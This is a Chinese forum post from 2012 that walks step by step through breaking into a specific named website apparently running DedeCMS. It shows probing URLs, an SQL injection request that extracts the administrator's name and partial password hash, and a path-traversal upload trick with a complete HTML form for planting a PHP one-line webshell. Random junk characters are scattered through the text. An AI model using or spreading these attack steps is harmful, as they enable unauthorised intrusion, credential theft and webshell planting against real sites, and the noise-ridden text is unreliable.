①注入漏洞。+ ]' j" G d4 v# I: W& }2 v
这站 http://www.political-security.com/+ i+ U' c+ R$ d1 R, n- e
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,3 r5 [$ h. X* k6 n9 b0 Q: v. I, @
www.political-security.com/data/mysql_error_trace.inc 爆后台
2 z9 P* K- t4 ?! l然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
8 @6 x m2 W f然后写上语句
1 k0 J% i/ f0 c; s& F- Z: d查看管理员帐号
5 k; r) B+ K& ^ v- i" khttp://www.political-security.co ... &membergroup=@`
& {: ?: l: f" V( b# V7 j) N3 h0 F p) W* B. l8 J
admin
, C3 u/ {8 b; ~- y
' N0 b4 F5 d* M8 u! \! a查看管理员密码
0 B$ w' p% M2 N d1 s6 B- a; C http://www.political-security.co ... &membergroup=@`: i6 y e/ ?3 `5 {/ w/ j
4 g: x$ A* x1 q* }# ?8d29b1ef9f8c5a5af429
4 j) e1 Q6 f4 V* K2 o; s5 n9 @3 c; ~
查看管理员密码) B) b& X4 J0 k1 u+ a: E# L0 }: B
( z8 P( |/ l( c; b7 g" `# J2 G得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD57 @7 x' m! t/ K- W
* H9 H) l! q. i2 s: g: f' K8d2
4 ?& b3 u# L9 u( n0 P0 X9b1ef9f8c5a5af42. S, n) q4 H0 [: ?
94 ] t( Z+ l9 a
5 M+ v. j- w1 kcmd5没解出来 只好测试第二个方法
" e! Q6 s% o! `( H2 t8 }3 d6 k) W( C" J0 J+ ?' H; B
& G3 u8 D3 H/ x$ p% k1 Z②上传漏洞:, h' [6 R9 S$ V% A; g6 o
8 Q6 B( H) ?! G% K+ ]4 I只要登陆会员中心,然后访问页面链接
! D$ f2 }! @0 W! w“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
0 u: ^ ?- b" P& k0 E
9 E' B& i0 N5 U5 a如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
; f: w4 M m; b3 R, C/ [7 i
9 I3 F( D0 B3 F7 J于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm5 j/ B* e. I& {5 O7 ?4 e2 J. |
5 K& v1 y5 S5 m3 T
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
3 u/ I* r$ l" T3 }2 A$ Z或者4 }4 k! { ]5 N* r2 F; n% \) R1 s* [
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对